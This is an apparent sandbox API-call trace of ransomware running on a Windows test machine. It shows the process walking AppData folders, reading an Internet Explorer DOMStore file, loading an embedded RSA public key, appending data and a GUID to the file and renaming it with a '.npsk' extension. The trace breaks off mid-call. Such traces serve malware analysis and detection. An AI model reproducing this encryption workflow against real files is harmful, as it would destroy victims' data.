[0218.508] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.508] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.508] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.508] PathFindFileNameW (pszPath="") returned="" [0218.508] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.509] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.509] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.509] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.509] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.510] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.510] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.510] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.510] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.510] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.510] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.510] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.510] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.510] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.510] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.510] PathFindFileNameW (pszPath="") returned="" [0218.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="all", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brt", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brz", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dan", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dut", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eng", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="frn", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="grm", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="itl", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrw", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="prt", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spn", cAlternateFileName="")) returned 1 [0218.513] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 1 [0218.514] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 0 [0218.514] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.515] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.515] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.515] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\") returned="36USA68T\\" [0218.515] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0218.515] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0218.515] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0218.515] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.515] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.515] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.515] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.515] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.515] PathFindFileNameW (pszPath="") returned="" [0218.516] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.517] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.517] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 1 [0218.517] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned=".xml" [0218.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0218.517] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=13) returned 1 [0218.517] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0218.519] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xd, lpOverlapped=0x0) returned 1 [0218.521] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.521] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.521] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0218.521] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f08) returned 1 [0218.522] CryptCreateHash (in: hProv=0x7b1f08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0218.522] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0218.522] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0218.522] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0218.522] GetLastError () returned 0x0 [0218.522] CryptDestroyHash (hHash=0x3277d68) returned 1 [0218.522] CryptReleaseContext (hProv=0x7b1f08, dwFlags=0x0) returned 1 [0218.522] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0218.522] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0218.522] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0218.522] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0218.523] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0218.523] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0218.523] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0218.523] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0218.523] CloseHandle (hObject=0x61c) returned 1 [0218.525] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.npsk")) returned 1 [0218.527] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 0 [0218.527] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.527] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.527] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.527] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\") returned="3O75JDME\\" [0218.527] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0218.527] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0218.527] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0218.527] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.527] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.527] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.527] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.528] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.528] PathFindFileNameW (pszPath="") returned="" [0218.528] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.529] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.529] FindNextFileW (in: hFindFile=0x3277d28, 